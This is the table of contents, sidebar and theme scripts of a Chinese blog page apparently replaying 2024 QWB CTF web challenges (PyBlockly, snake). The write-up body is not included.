        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text"> Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pyblockly"><span class="toc-number">1.1.</span> <span class="toc-text"> PyBlockly</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%B8%80-python-%E7%9A%84-pth-%E6%96%87%E4%BB%B6%E6%9C%BA%E5%88%B6"><span class="toc-number">1.1.1.</span> <span class="toc-text"> 法一 Python 的 .pth 文件机制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-number">1.1.1.1.</span> <span class="toc-text"> 知识点</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">1.1.1.2.</span> <span class="toc-text"> 解题</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%BA%8C-%E9%97%AD%E5%90%88%E9%80%83%E9%80%B8%E8%A6%86%E7%9B%96len"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 法二 闭合逃逸+覆盖len</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#snake"><span class="toc-number">1.2.</span> <span class="toc-text"> snake</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">396</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">327</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.0.6/dist/index.umd.js" integrity="sha384-vkGvf25gm1C1PbcoD5dNfc137HzNL&#x2F;hr1RKA5HniJOaawtvUmH5lTVFgFAruE9Ge" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "FuB0Y",
          title: "强网杯2024复现",
          url: "https://fub0y2026.github.io/2025/10/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2024%E5%A4%8D%E7%8E%B0/",
          excerpt: "",
          description: "",
          stripContent: "太难了，都看不懂 [TOC]  Web  PyBlockly 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109",
          date: "Thu Oct 16 2025 19:59:08 GMT+0800",
          updated: "Tue Dec 09 2025 21:45:47 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.js" integrity="sha384-7zkQWkzuo3B5mTepMUcHkMB5jZaolc2xDwL6VFqjFALcbeS9Ggm&#x2F;Yr2r3Dy4lfFg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/contrib/auto-render.min.js" integrity="sha384-43gviWU0YVjaDtb&#x2F;GhzOouOXtZMP&#x2F;7XUzwPTstBeZFe&#x2F;+rCMvRwr4yROQP43s0Xk" crossorigin="anonymous" defer onload="renderMathInElement(document.body, {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  





  </body>
  </html>

